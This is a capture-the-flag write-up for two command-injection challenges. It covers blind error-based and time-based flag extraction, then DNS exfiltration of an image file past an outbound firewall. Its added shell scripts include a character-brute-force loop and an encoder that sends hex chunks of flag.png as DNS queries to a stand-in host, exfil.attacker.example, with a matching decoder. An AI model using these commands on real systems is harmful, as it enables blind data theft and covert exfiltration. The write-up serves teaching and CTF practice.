Omar Mohamed
In the name of Allah, the Most Gracious, the Most Merciful

This one will be a quick one! I am really tight on time but wanted to get this writeup out. I made the chal with my friend Korea.
Download the source code from here. Note: the source code is the same in both chals; only the flag file is different.
cat flag.txt
The first challenge was called "cat flag.txt".

It is a simple terminal that only tells you whether your command executed successfully or not. In short, it is an error-based oracle.
You know the flag is at flag.txt, so you can do a blind comparison to get the flag. For example, one of the payloads used was:

If the flag contains "CON" the command succeeds, otherwise it errors, and like that you brute-force the flag one character at a time.
Another payload used was time-based:

This checks whether the first character of the flag is "C"; if it is, the command sleeps for 4 seconds, otherwise it returns immediately. He used time-based blind injection to get the flag.
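The two blind oracles above, as an added example that is not one of the challenge's payloads (the original payload blocks did not survive on this page). Both oracles are simulated locally over a constructed flag file so the script runs offline; the flag value, the regex charset and the 2-second sleep are assumptions. The extraction loop is the general form of the "CON" check: anchor the guess with `^`, extend the known prefix one character at a time, and stop when no candidate matches.

```shell
#!/bin/sh
# Added example (not the challenge's own payloads): a local stand-in for the
# two blind oracles. The real terminal runs our injected command on the server
# and reports only success/failure (or nothing but how long it took); here the
# oracle is a shell function over a constructed flag file, so this runs offline.

FLAG_FILE="${FLAG_FILE:-$(mktemp)}"
printf 'CONFIDENTIAL{sample_flag}\n' > "$FLAG_FILE"   # constructed sample, not the real flag

# Error-based oracle: exits 0 (the terminal reports success) only when the
# regex matches the flag, e.g. `error_oracle CON` is the "CON" substring check.
error_oracle() {   # $1 = regex tested against the flag
    grep -q -- "$1" "$FLAG_FILE"
}

# Time-based oracle: the injected command sleeps only on a match, so the
# response time leaks one bit per request even when errors are hidden. The
# chal used 4 s; 2 s is enough here because date(1) has 1 s resolution, so a
# non-sleeping request can never measure as 2 s or more.
time_oracle() {   # $1 = regex; exits 0 if the request took at least 2 s
    start=$(date +%s)
    if grep -q -- "$1" "$FLAG_FILE"; then sleep 2; fi
    end=$(date +%s)
    [ $((end - start)) -ge 2 ]
}

# Keep the charset free of regex metacharacters, since each guess is anchored
# with ^ and glued onto the recovered prefix (assumed flag alphabet).
CHARSET='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_{}'

# Recover the flag one character at a time: extend the known prefix with each
# candidate until the oracle says yes; when no candidate matches we are at the
# end of the flag. Cost is at most one request per charset character per flag
# character, so ~65 requests per character worst case.
extract_flag() {   # $1 = oracle function name, e.g. error_oracle
    prefix=""
    while :; do
        found=0
        i=1
        while [ "$i" -le "${#CHARSET}" ]; do
            c=$(printf '%s' "$CHARSET" | cut -c"$i")
            if "$1" "^${prefix}${c}"; then
                prefix="${prefix}${c}"
                found=1
                break
            fi
            i=$((i + 1))
        done
        [ "$found" -eq 1 ] || break
    done
    printf '%s' "$prefix"
}

# Usage: extract_flag error_oracle   (extract_flag time_oracle also works,
# at roughly one sleep per correctly guessed character)
```

In the real chal the oracle function is replaced by the HTTP request that submits the injected command; the loop is otherwise the same, and the time-based variant only needs the threshold raised to match the sleep you inject.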
A third, creative approach was:

He moved the flag file into the public directory and accessed it directly. 🙃 (We closed that in the revenge chal, "cat flag.png".)
cat flag.png
Now, here you can't just brute-force characters: the flag is an image file. You can hex-dump it, but that still leaves thousands of characters to brute-force.

So, any easier ideas?
Players noticed that there is a firewall that blocks the usual outgoing tools like wget and ping, but DNS queries still resolve. That means you can't pull the flag out over HTTP, but you can leak small pieces of data by encoding them into DNS requests (DNS exfiltration).
This technique is used in real intrusions because outbound DNS is almost always allowed through firewalls. Attackers hide stolen data inside DNS queries for domains they control; the name server they run logs every query, quietly exfiltrating the data.
You can use Burp Collaborator for this, or your own authoritative DNS server, but a free option is any online DNS-logging service such as dig.pm or webhook.site.
A payload like this can be used:
You will get DNS requests like this:

What the payload does is hex-dump flag.png and, for each line of the dump, make a DNS request for that line as a subdomain of your domain. You then collect all the requests from the log, put the lines back in order, and convert the hex back to binary to recover flag.png.
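The hex-dump-and-query pipeline above and its reverse, as an added example that is not the challenge's payload: a POSIX shell script that builds the query names the injected command would send, then reassembles the file from a constructed DNS log. The domain exfil.attacker.example, the label size and the sample PNG bytes are assumptions. It handles the practical caveats a real log throws at you: queries arrive out of order, resolvers retry (so you see duplicates), some randomise letter case, and unrelated lookups are mixed in. That is why each label carries a sequence number and why the dump is hex rather than base64.

```shell
#!/bin/sh
# Added example (not the challenge's own payload): encoder and decoder for the
# DNS exfiltration described above, run offline against a constructed DNS log.
# The domain below is an assumption; swap in the one your DNS-logging service
# (dig.pm, webhook.site, Burp Collaborator, your own NS) gives you.

ATTACKER_DOMAIN="exfil.attacker.example"   # assumption, not a real domain
CHUNK_HEX=20   # hex chars per label; a DNS label may hold up to 63, a name 253

# Constructed stand-in for flag.png (not the challenge's file): the 8-byte PNG
# signature, a 16x16 RGB IHDR chunk and an IEND chunk, 45 bytes in all, so the
# dump spans several labels and contains NUL bytes that must survive the trip.
SAMPLE="${SAMPLE:-$(mktemp)}"
printf '\211PNG\r\n\032\n\000\000\000\015IHDR\000\000\000\020\000\000\000\020\010\002\000\000\000\220\221h6\000\000\000\000IEND\256B\140\202' > "$SAMPLE"

# Encoder, i.e. what the injected command computes on the target: hex-dump the
# file, split it into label-sized lines, prefix each with a 4-digit sequence
# number and append our domain. On the target each name is then resolved with
# whatever client survived the firewall, e.g.
#   make_query_names flag.png | while read -r n; do nslookup "$n" >/dev/null 2>&1; done
make_query_names() {   # $1 = file to exfiltrate; prints one query name per line
    od -An -v -tx1 "$1" | tr -d ' \n' | fold -w "$CHUNK_HEX" |
        awk -v dom="$ATTACKER_DOMAIN" '{ printf "%04d.%s.%s\n", NR - 1, $1, dom }'
}

# Hex to raw bytes using only printf, so the receiving side needs no xxd.
hex_to_bin() {   # reads hex on stdin, writes bytes on stdout
    hex=$(tr -d '\n')
    while [ -n "$hex" ]; do
        byte=${hex%"${hex#??}"}   # first two hex digits
        hex=${hex#??}
        printf "\\$(printf '%03o' "$((0x$byte))")"
    done
}

# Decoder, run on the DNS log you collected: fold case (resolvers may randomise
# it, which is why hex beats base64 here), keep only names under our domain,
# dedupe retries, restore the order from the sequence label and turn the hex
# back into the file.
reassemble() {   # reads logged query names on stdin, writes the file on stdout
    tr '[:upper:]' '[:lower:]' |
        awk -F. -v dom=".$ATTACKER_DOMAIN" \
            'substr($0, length($0) - length(dom) + 1) == dom { print $1 "." $2 }' |
        sort -u | cut -d. -f2 | tr -d '\n' | hex_to_bin
}

# Round trip through a constructed DNS log: the names arrive out of order, one
# is duplicated, one has its case randomised, and an unrelated lookup is mixed
# in. Exits 0 if the reassembled file is byte-identical to the original.
dns_exfil_roundtrip() {   # $1 = file to exfiltrate
    log=$(mktemp); out=$(mktemp)
    {
        make_query_names "$1" | sort -r
        make_query_names "$1" | head -n 1
        make_query_names "$1" | head -n 1 | tr '[:lower:]' '[:upper:]'
        echo "www.example.com"
    } > "$log"
    reassemble < "$log" > "$out"
    [ "$(od -An -v -tx1 "$1" | tr -d ' \n')" = "$(od -An -v -tx1 "$out" | tr -d ' \n')" ]
}

# Usage: dns_exfil_roundtrip "$SAMPLE" && echo "flag.png survived the round trip"
```

Only the query names matter: the answers can all be NXDOMAIN, since the leak happens the moment the authoritative server (or the logging service in front of it) sees the question. Keep the labels hex or another case-insensitive encoding, number them, and expect to re-request a chunk or two if the log has gaps.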
You can use other tools like dig, nslookup, etc.; all lead to the same result.

That's it for this challenge. Hope you enjoyed the writeup and learned something new. Till the next one!